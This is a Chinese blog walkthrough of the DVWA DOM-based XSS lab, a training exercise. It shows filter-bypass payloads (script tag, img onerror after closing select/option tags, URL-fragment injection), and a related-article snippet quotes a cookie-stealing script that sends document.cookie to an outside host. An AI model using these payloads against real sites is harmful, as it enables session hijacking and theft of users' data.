dvwa10——XSS(DOM)

原创 已于 2025-06-05 11:48:33 修改
· 683 阅读 · 5 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #前端 #dvwa #靶场 #网络安全 #javascript #靶机

于 2025-06-05 11:45:43 首次发布

XSS攻击:

  • DOM型XSS
  1. 只在浏览器前端攻击
  2. 触发:修改url片段
  3. 代码不存储
  • 反射型XSS
  1. 经过服务器攻击
  2. 触发:可能通过提交恶意表单,连接触发
  3. 代码不存储
  • 存储型XSS
  1. 经由服务器攻击
  2. 触发:可能通过提交恶意表单,连接触发
  3. 代码存储

这一关有关于DOM型XSS攻击,是完全发生在浏览器url栏中的攻击

LOW

查看源码,没有发现任何过滤

界面上的select一下,观察url栏的变化

http://10.24.8.102/DVWA/vulnerabilities/xss_d/?default=English

我们在等号后面进行改动,这样浏览器就会把我们输入的内容当成网页的一部分来执行

在url栏里加上javascript的内容,这个alert是javascript的内置函数,作用是在浏览器中弹出对话框

http://10.24.8.102/DVWA/vulnerabilities/xss_d/?default=<script>alert<'im lee'>;</script>

f12在查看器的html里也可以看到我们插入的代码被成功执行了

MEDIUM

分析源码:

红框内使用stripos()函数检测了 <script 标签,不区分大小写,并且一旦发现含有<script 的恶意输入,立马重定向到english页面

过滤不全面,我们还可以通过其他 html 标签触发xss,例如

<img src=x onerror=alert('im lee');>

img是html的图像标签,src是img的属性,onerror是<img>标签的事件处理器,在图片加载失败的时候触发,也就是说我们想要的内容会在图片加载失败的警告框里面出现

我们让src=x,这里的x是一个无效的图片路径

输入之前没产生回显,所以进一步检查页面的html,发现代码在option里面,但img无法嵌套在option内,所以我们要把select和option标签都闭合,

也就是在刚才的代码前插入这个 

</select></option><img src=x onerror="alert('im lee')">

回显成功: 

 

HIGH

分析源码,添加了白名单验证,如果输入的不是四者之一,就会重定向到English的页面

这一关的方法是用字符#,#及以后的内容称为“片段标识符”,浏览器不会把这部分内容发送到服务器,也就意味着不会被过滤,只会在客户端本地处理

构造payload如下

?default=English#<script>alert('im lee')</script>

回显成功

IMPOSSIBLE

分析源码:

直接在客户端处理了,url里输入什么都没有用

❀❀❀ 完结撒花!!❀❀❀

Le_ee
关注
DVWA——XSS注入复现
qq_62056583的博客
07-13 2041
在对DVWA靶场漏洞复现前,先了解一下XSS漏洞的相关知识攻击者利用它向网页中注入恶意的客户端脚本,使得用户在访问页面时执行这些恶意脚本,从而达到攻击的目的。这种攻击通常利用了网站未对用户输入进行充分过滤或转义的情况。XSS的攻击方式分为三种,分别是:分别为反射型(Reflected),存储型(Stored)DOM型。:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。(经后端,不经数据库):将用户输入的数据存储在服务器端。
DVWA系列——XSS(跨站脚本注入(反射型,储存型,DOM))
weixin_49340699的博客
12-15 2588
DVWA系列——XSS(跨站脚本注入)简介low级别反射型xss源码分析储存型xss源码分析DOMxss源码分析medium级别反射型xss源码分析破解思路储存型xssDOMxss源码分析high级别反射型xss储存型xssDOMxss 简介 XSS全称Cross Site Scripting,即跨站脚本攻击,从某种意义上来说也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面,恶意代码就会在浏览器页面执行,xss不限于javascript,还包括flash等其他脚本语言,根据代
DVWA靶场练习(九)—— XSS (DOM)
liuzibo1024的博客
11-08 426
XSS漏洞,即跨站脚本攻击(Cross-Site Scripting),是一种常见的网络安全漏洞。它允许攻击者在其他用户访问的网页中注入恶意脚本。XSS攻击的主要目标是通过在受害者的浏览器中执行恶意代码来窃取敏感信息、篡改网页内容或劫持用户会话。本实验的目标是利用XSS漏洞获取登录用户的Cookie。
DVWA靶场通关——DOMXSS漏洞
sucker的博客
11-29 2717
DOMXSSDOM-based Cross-Site Scripting,DOM XSS)是一种跨站脚本攻击(XSS)的变种,它与传统的反射型XSS(Reflected XSS)或存储型XSS(Stored XSS)有所不同,主要是发生在客户端(浏览器端),并且依赖于网页中动态的文档对象模型(DOM)结构。:如果页面存在涉及状态更改的操作(如修改密码、删除内容等),而没有对请求进行适当的防护(例如 CSRF token),攻击者可以利用该漏洞执行伪造的操作,导致用户的会话受到攻击。
DVWA——XSS(Dom low&medium)
qq_54448882的博客
11-07 3193
目录 前言 XSS攻击流程 XSS的危害 XSS的漏洞类型 JS基本语句 XSS DomLow XSS Dom Medium 前言: XSS被称为跨站脚本攻击,全称Cross-site scripting,本来缩写为CSS,但是为避免与CSS(全称Cascading Style Sheets,层叠样式脚本)重名,于是更名为XSS。这个漏洞主要利用JS(Java Script)完成恶意的攻击行为,因为浏览器不会判断JS代码是否为恶意代码,当攻击者将代码注入到网页中,浏览器解析运行这段代码..
dvwa学习笔记——domxss
weixin_45082914的博客
08-18 531
三、domxss DOM xss是基于dom文档对象模型,前端脚本通过dom动态修改页面,由于不与服务端进行交互,而且代码是可见的,从前端获取dom中的数据在本地执行。 常见的可以操纵dom的对象:URL,localtion,referrer等。 low源码: dvwa下的domxss页面的意思是选择一种语音,只在前端执行,且代码并未对default进行处理 漏洞分析与利用: 源码并未做任何安全防护措施,所以可以直接在url上构造攻击脚本 构造脚本: ...dvwa/vulnera
DVWA——XSS(DOM)
Fly_Mojito的博客
02-07 141
DVWA——XSS(DOM)
DVWA——XSS(DOM)(low)
分享简单的安全技术
01-13 182
XSS(DOM) 界面 源代码 <?php # No protections, anything goes ?> 渗透步骤           第一步:点击select按钮,发现url栏出现变化,得知是使用get方式。           第二步:将English修改为,按回车访问修改后的url,发现弹窗,注入成功。 ...
DVWA靶场XSSDOM/Reflected/Stored)/XSS+CSRF
m0_51150495的博客
06-15 2228
xss(dom/reflected/stored) xss+csrf
DVWA系列之XSS(跨站脚本攻击)——DOMXSS源码分析及漏洞利用
7Riven's blog
11-27 1562
DOMXSS Document Object Model 文本对象模型xss、可能是存储型也可能是反射型、只决定于输出地方 在反射型XSS中输入: <script>var img=document.createElement('img');img.src='http://192.168.232.130:88/log?'+escape(document.cookie);&...
代码审计——DVWA DOM Based Cross Site Scripting (XSS) DOMXSS
z1756227332的博客
03-13 1309
关于三种XSS类型的流程 DOM型 代码 -> 浏览器(js) 反射性型 代码 -> 浏览器 ->php -> 浏览器 存储性型 代码->浏览器->PHP->数据库->php->浏览器 Low等级代码 <?php 这个意思就是没有过滤 输入什么就会输出什么。 # No protections, anything goes 没有保护,什么都...
渗透实战PortSwigger Labs AngularJS DOM XSS利用详解
ericalezl的博客
06-02 679
本Lab学习到关于AngularJS的 xss 漏洞利用直接输入回显页面,但是把<>进了 html 编码了当我们输入{{1+1}},没有当作字符处理,而是执行了{{}}是多种前端框架(如 Vue、Angular、Django 模板等)中常见的模板插值语法,主要用于将数据动态绑定到视图,双花括号{{1+1}}包裹的表达式会执行运算。测试,因为存在沙箱机制过滤了危险字符这里用到新的绕过方法下面分析为什么这样可以执行alert()创建 AngularJS 代码</</</</
dvwa12——XSS(Stored)
最新发布
2403_88102829的博客
06-05 361
这一关是存储型的xss写入恶意代码→存入服务器→用户访问→代码执行→用户数据泄露。
pikachu靶场通关笔记13 XSS关卡09-XSS之href输出
mooyuan的网络安全博客
06-04 1205
本系列为通过《pikachu靶场通关笔记》的XSS关卡(10关)渗透集合,通过对XSS关卡源码的代码审计找到安全风险的真实原因,讲解XSS的原理并进行渗透实践,本文为XSS09关卡XSS之href输出的渗透部分。
pikachu靶场通关笔记12 XSS关卡08-XSS之htmlspecialchars(四种方法渗透)
mooyuan的网络安全博客
06-03 1114
本系列为通过《pikachu靶场通关笔记》的XSS关卡(10关)渗透集合,通过对XSS关卡源码的代码审计找到安全风险的真实原因,讲解XSS的原理并进行渗透实践,本文为XSS第08关卡XSS之htmlspecialchars关卡的渗透部分。
pikachu靶场通关笔记11 XSS关卡07-XSS之关键字过滤绕过(三种方法渗透)
mooyuan的网络安全博客
06-03 1030
本系列为通过《pikachu靶场通关笔记》的XSS关卡(10关)渗透集合,通过对XSS关卡源码的代码审计找到安全风险的真实原因,讲解XSS原理并进行渗透实践,本文为XSS关卡第07关XSS过滤关卡的渗透部分。
pikachu靶场通关笔记14 XSS关卡10-XSS之js输出(五种方法渗透)
mooyuan的网络安全博客
06-04 1124
本系列为通过《pikachu靶场通关笔记》的XSS关卡(10关)渗透集合,通过对XSS关卡源码的代码审计找到安全风险的真实原因,讲解XSS的原理并进行渗透实践,本文使用5种方法对XSS1第10关卡XSS之js输出进行渗透。
pikachu靶场通关笔记10 XSS关卡06-XSS之盲打
mooyuan的网络安全博客
06-02 1021
本系列为通过《pikachu靶场通关笔记》的XSS关卡(10关)渗透集合,通过对XSS关卡源码的代码审计找到真实原因,讲解XSS的原理并进行渗透实践,本文为XSS第06关-XSS盲打的渗透部分,并且结合源码分析,对比通用的XSS攻击讲解攻击成因。
JavaSec-XSS
luxury的博客
06-05 713
存储型XSS:攻击者将恶意脚本上传到目标网站的数据库,用户访问网站时执行这些恶意脚本,达到攻击目的。该攻击经过服务器和数据库DOM(Document Object Model)即文档对象模型,是HTML和XML文档的编程接口 DOMXSS:攻击者利用客户端的DOM环境,通过操纵页面的DOM元素来注入和执行恶意脚本。该攻击不经过服务器和数据库一些可能导致DOM XSS的SINK点:PS:除此之外,还有URL参数注入、DOM属性注入、document.write、eval等场景,后续会进行补充。
DVWA-XSS(DOM)
08-25
DVWA-XSS(DOM)是指DVWA靶机学习中的一种XSS攻击,它利用了DOM(文档对象模型)中的漏洞。DOM是一个与平台、编程语言无关的接口,允许程序或脚本动态地访问和更新文档内容、结构和样式。而DVWA-XSS(DOM)攻击则是通过在DOM中注入恶意脚本来篡改网页,从而控制用户浏览器的一种攻击行为。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [houkc.github.io:HouKC的博客](https://download.csdn.net/download/weixin_42157567/18459500)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [DVWA-XSS(DOM)](https://blog.csdn.net/weixin_44866139/article/details/104101228)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值